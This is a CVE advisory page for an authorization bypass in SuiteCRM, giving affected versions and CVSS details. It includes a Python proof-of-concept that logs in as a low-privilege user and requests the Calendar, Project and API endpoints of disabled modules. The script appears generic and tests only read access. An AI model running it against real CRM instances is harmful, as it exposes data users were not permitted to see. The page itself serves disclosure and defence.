Security Vulnerability Report
CVE-2025-64490 CVSS 8.3 HIGH

CVE-2025-64490

Published: 2025-11-08 01:15:39
Last Modified: 2025-11-25 17:32:46

Description

SuiteCRM is an open-source, enterprise-ready Customer Relationship Management (CRM) software application. Versions 7.14.7 and prior, 8.0.0-beta.1 through 8.9.0 allow a low-privileged user with a restrictive role to view and create work items through the Resource Calendar and project screens, even when the related modules (Projects, Project Tasks, Tasks, Leads, Accounts, Meetings, Calls) are explicitly set to Disabled/None in Role Management. This indicates inconsistent ACL/RBAC enforcement across modules and views, resulting in unauthorized data exposure and modification. This issue is fixed in versions 7.14.8 and 8.9.1.

CVSS Details

CVSS Score: 8.3
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L
Weakness: CWE-863 (Incorrect Authorization)

Configurations (Affected Products)

cpe:2.3:a:salesagility:suitecrm:*:*:*:*:*:*:*:* (versions before 7.14.8) - VULNERABLE
cpe:2.3:a:salesagility:suitecrm:*:*:*:*:*:*:*:* (versions from 8.0.0 up to but excluding 8.9.1) - VULNERABLE
SuiteCRM < 7.14.8 (7.14.7 and prior)
SuiteCRM 8.0.0-beta.1 - 8.9.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-64490 SuiteCRM ACL Bypass PoC
# This PoC demonstrates unauthorized access to disabled modules
import requests
from bs4 import BeautifulSoup

TARGET_URL = "http://target-suitecrm.com"
USERNAME = "low_privilege_user"
PASSWORD = "user_password"


def login(session, target_url, username, password):
    """Authenticate to SuiteCRM and obtain session cookie"""
    login_url = f"{target_url}/index.php?action=Login&module=Users"
    response = session.get(login_url)

    # Extract CSRF token
    soup = BeautifulSoup(response.text, 'html.parser')
    csrf_token = soup.find('input', {'name': 'csrf_token'}) or \
        soup.find('input', {'name': 'return_module'})

    login_data = {
        'user_name': username,
        'user_password': password,
        'action': 'Login',
        'module': 'Users'
    }
    if csrf_token:
        login_data['csrf_token'] = csrf_token.get('value', '')

    return session.post(login_url, data=login_data)


def exploit_calendar_access(session, target_url):
    """Access Resource Calendar despite disabled module permissions"""
    calendar_url = f"{target_url}/index.php?module=Calendar&action=index"
    response = session.get(calendar_url)
    if response.status_code == 200:
        print("[+] Successfully accessed Resource Calendar (should be disabled)")
        return response.text
    return None


def exploit_project_access(session, target_url):
    """Access Project module despite disabled permissions"""
    project_url = f"{target_url}/index.php?module=Project&action=index"
    response = session.get(project_url)
    if response.status_code == 200:
        print("[+] Successfully accessed Project module (should be disabled)")
        return response.text
    return None


def exploit_api_access(session, target_url):
    """Direct API access to restricted modules"""
    api_endpoints = [
        '/api/v8/modules/Project',
        '/api/v8/modules/ProjectTask',
        '/api/v8/modules/Tasks'
    ]
    results = {}
    for endpoint in api_endpoints:
        response = session.get(f"{target_url}{endpoint}")
        if response.status_code == 200:
            print(f"[+] API access successful: {endpoint}")
            results[endpoint] = response.json()
    return results


def main():
    session = requests.Session()

    # Step 1: Login with low-privilege account
    print("[*] Attempting login with low-privilege account...")
    login_response = login(session, TARGET_URL, USERNAME, PASSWORD)

    if 'error' not in login_response.url.lower():
        print("[+] Login successful")

        # Step 2: Exploit ACL bypass via Calendar
        print("[*] Testing Resource Calendar access...")
        exploit_calendar_access(session, TARGET_URL)

        # Step 3: Exploit ACL bypass via Project module
        print("[*] Testing Project module access...")
        exploit_project_access(session, TARGET_URL)

        # Step 4: Direct API exploitation
        print("[*] Testing direct API access...")
        exploit_api_access(session, TARGET_URL)
    else:
        print("[-] Login failed")


if __name__ == "__main__":
    main()
```

References

https://github.com/SuiteCRM/SuiteCRM/security/advisories/GHSA-jh8v-wqgj-hhc2 (Vendor Advisory)